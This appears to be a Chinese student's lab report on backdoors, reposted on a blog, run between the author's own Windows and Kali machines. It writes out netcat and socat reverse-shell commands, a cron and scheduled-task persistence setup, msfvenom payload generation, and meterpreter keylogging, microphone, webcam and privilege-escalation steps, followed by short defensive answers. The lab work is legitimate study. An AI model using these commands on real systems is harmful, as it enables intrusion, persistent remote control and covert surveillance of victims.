zoukankan      html  css  js  c++  java
  • Exp2-后门原理与实践 20181223何家豪

    实验内容

    准备工作

    在cmd中获得Windows的IP地址:192.168.3.125

    在终端模拟器中获得kali的IP地址,需要先使用命令export PATH=/usr/sbin/:$PATH转到ifconfig所在目录为/usr/sbin下,再使用ifconfig获得IP地址:192.168.3.180

    一、使用netcat获取主机操作Shell,cron启动

    1. Windows获得Linux shell

    打开cmd,跳转至ncat工具所在目录之中,并输入指令ncat.exe -l -p 1223 ,通过ncat工具监测1223端口

    然后进入Linux终端输入nc 192.168.3.125 1223 -e /bin/sh,反弹连接Windows

    windows获得kali中linux的shell,验证后,以ls为例,反弹连接成功

    2. Linux获得window Shell

    在kali终端中输入nc -l -p 1223

    然后在Windows里反弹连接Linuxncat.exe -e cmd.exe 192.168.3.180 1223

    Linux下看到Windows的命令提示,成功获得Windows的shell

    3. 通过crontab命令,定时启动任务

    在Windows下输入ncat.exe -l -p 1223打开监听
    然后在Linux里输入crontab -e添加定时启动任务

    进入vim编辑器中,在最后一行添加定时任务指令,3 * * * * /bin/netcat 192.168.3.125 1223 -e /bin/sh,保存退出

    3分钟后,获得权限

    二、使用socat获取主机操作Shell, 任务计划启动

    在Windows里打开任务计划程序
    新建任务。命名为20181223

    设置触发器为工作站锁定时

    新建操作为打开socat.exe,添加参数tcp-listen:1223 exec:cmd.exe,pty,stderr,保存

    win+L锁定后,弹窗警告,点击确定

    在Linux中输入socat - tcp:192.168.3.125:1223,成功获得Windows的shell

    三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    在Linux中输入以下指令以生成后门文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.180 LPORT=1223 -f exe > 20181223_backdoor.exe

    在Windows下输入ncat.exe -l 1223 > 20181223_backdoor.exe,准备接收后门文件

    在Linux下输入nc 192.168.3.125 1223 < 20181223_backdoor.exe

    Windows下的资源管理器中查看传送过来的文件

    在Linux下输入msfconsole,进入控制台

    输入use exploit/multi/handler,进入监听模式
    输入set payload windows/meterpreter/reverse_tcp设置载荷,基于TCP的反向连接反弹windows shell
    输入set LHOST 192.168.3.125,设置主机ip
    输入set LPORT 1223设置本机端口

    输入exploit,开始监听

    启动之前的后台程序,成功得到shell

    四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    输入record_mic截获一段音频,输入webcam_snap调用摄像头拍照

    调用摄像头时火绒给我拦截了,然后我没办法修改火绒的规则,所以这一步失败。。。下次记得千万别安装杀毒软件

    输入keyscan_start截取主机中的击键记录,输入keyscan_dump停止并显示击键记录

    输入getsystem提权

    五、基础问题回答

    1. 例举你能想到的一个后门进入到你系统中的可能方式?

    浏览网页时,不小心下载了恶意软件,如果再不小心打开它,恶意程序就会通过后门进入你的系统。

    2. 例举你知道的后门如何启动起来(win及linux)的方式?

    可以通过伪装成正常软件诱导用户点击来启动,或者恶意软件可以隐藏在图片或者Word里面,当用户打开文件后恶意程序就会启动。

    3. Meterpreter有哪些给你映像深刻的功能?

    记录键盘的功能,这样会使得你的任何强力密码都能形同虚设。摄像头我已经通过物理手段隔绝了(贴胶带)。

    4. 如何发现自己有系统有没有被安装后门?

    可以使用杀毒软件来扫描计算机内部,看看有没有被入侵。或者可以使用nestat -na查看开放端口,往往大的端口被打开时就要小心了。

    六、实验总结与体会

    通过本次实验,我对计算机系统内部安全的认识又提高了。特别是对于恶意软件的危害。如果不小心让恶意软件获得了很高的权限,这是很危险的事。不过,最重要的是,我们应该提升自己的安全意识,不要点击下载未知来源的软件,不要给未知软件不必要的权限。

  • 相关阅读:
    【 一次性密码】TOTP
    动态令牌-(OTP,HOTP,TOTP)-基本原理
    动态口令
    Jmeter参数化 CSV Data Set Config界面说明
    Jmeter测试监控 Summary Report界面
    jmeter命令行参数
    jmeter场景设计
    jmeter事务控制器
    软件测试模型
    业务流程测试
  • 原文地址:https://www.cnblogs.com/soujiokita/p/14587434.html
Copyright © 2011-2022 走看看